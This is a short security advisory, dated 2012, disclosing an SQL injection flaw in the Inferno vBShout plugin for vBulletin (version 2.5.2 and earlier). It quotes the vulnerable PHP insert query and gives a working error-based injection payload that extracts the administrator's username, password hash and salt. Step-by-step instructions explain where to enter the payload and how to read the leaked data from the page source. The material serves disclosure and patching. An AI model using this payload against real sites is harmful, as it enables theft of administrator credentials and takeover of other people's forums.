Inferno vBShout SQL Injection Vulnerability

Summary

Inferno vBShout suffers from SQL injection vulnerability

Credit:

The information has been provided by Luit.


Details

Vulnerable Systems:
 * Inferno vBShout version 2.5.2 and prior

Vulnerable Code – infernoshout.php & inferno_settings.php
$commands = unserialize($this->settings[‘s_commands’]);

if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first(‘select * from ‘ . TABLE_PREFIX . ‘infernoshoutusers where s_user='{$this->vbulletin->userinfo[‘userid’]}”))
{
$this->vbulletin->db->query(‘
insert into ‘ . TABLE_PREFIX . ‘infernoshoutusers
(s_user, s_commands)
values
({$this->vbulletin->userinfo[‘userid’]}, ” . serialize($commands) . ”)
‘);
}

Exploit Location
# Location: http://site.com/infernoshout.php?do=options&area=commands

SQL Injection
‘ and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ”=’#

Insert SQL injection into the first ‘Command Input’ box and enter anything into the first ‘Command Output’ box, hit save settings, you will be treated with a database error, view the page source and scroll to the bottom of the page, you will see some quoted text containing the data you want.

Video Tutorial
http://www.youtube.com/watch?v=g70_JaKnBbw

Disclosure Timeline:
Published: 2012-08-17

Categories: Exploits